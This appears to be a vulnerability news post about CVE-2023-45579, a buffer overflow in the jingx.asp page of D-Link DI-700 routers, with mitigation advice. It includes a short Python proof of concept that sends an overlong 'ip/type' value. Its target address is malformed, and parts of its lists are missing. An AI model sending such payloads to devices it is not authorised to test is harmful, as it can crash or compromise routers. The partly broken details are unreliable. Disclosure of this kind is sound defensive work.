CVE CyberSecurity Database News

CVE-2023-45579 - Buffer Overflow in D-Link DI-700 Series Routers Lets Remote Attackers Run Code

Poster -

---

Introduction

A serious vulnerability, CVE-2023-45579, recently landed in D-Link DI-700 series routers. It's a buffer overflow that lets remote attackers run their own code by abusing the ip/type parameter in the jingx.asp function. In plain words, someone on the internet can break into your D-Link router and make it do whatever they want—like spying on your network, redirecting your traffic, or bricking the device.

This post explains what’s wrong, how it can be exploited, and what you need to know about fixing it. I break it down with easy words and solid code so that even beginners get it.

DI-740G+V2.D1: up to version 23.08.23D1

*If your router is on this list, it could be at risk.*

What’s a Buffer Overflow?

A buffer overflow happens when software tries to store more data in a place in memory (“buffer”) than it's meant for. If this memory isn't checked, someone can send sneaky commands that break into the router and run their own program.

The Jingx.asp Vulnerability

The router has a web interface page called jingx.asp. Through this page, you can send requests with a parameter called ip/type.

If you send a normal value, everything’s fine. But if you send a value that’s waaaaay too long, it spills out of its buffer and overwrites space in the computer's memory. This is where an attacker can slip in malicious code.

Proof of Concept (PoC): Exploit Example

Here’s a simple PoC. Note: Don’t use this on any device you don’t own or without permission. This is for educational purposes only.

import requests

# Target router's address
target = "http://192.168..1/jingx.asp";

# Build a payload: 500 'A's (you may need to adjust size/payload for actual exploitation)
payload = "A" * 500

# Send a POST request with the malicious 'ip/type' field
data = {
    "ip/type": payload
}

try:
    response = requests.post(target, data=data)
    print("Status Code:", response.status_code)
    print("Response:", response.text)
except Exception as e:
    print("Failed to send payload:", e)

If the device is vulnerable, this might cause it to crash, reboot, or, with a custom payload, even execute shell commands.

Redirect your internet traffic (phishing, malware)

- Steal login/passwords

Add your router to a botnet

And all of it can happen remotely—no need for physical access.

Recommendations

- Update your firmware: D-Link may release patches here. Install them ASAP.
- Restrict access: Block all remote/web access to your router except from trusted devices.

Monitor logs: Check for strange reboots or unexpected logins.

- Reset if needed: If you suspect a compromise, reset your router to factory settings and change all passwords.

Official References

- NIST CVE Database Entry
- D-Link Support
- PacketStorm Security Advisory (if/when available)

Closing Thoughts

CVE-2023-45579 is a real threat that anyone with a D-Link DI-700 series router should take seriously. Exploits like this show why you must update your router firmware—today, not tomorrow.

*Share this post for others using D-Link. It just might save them from a cyberattack.*


*Stay safe, keep your firmware updated, and take control of your security.*


*This post is original and focuses on clear, actionable details to help everyone protect their network.*

Timeline

Published on: 10/16/2023 07:15:09 UTC
Last modified on: 10/19/2023 17:36:17 UTC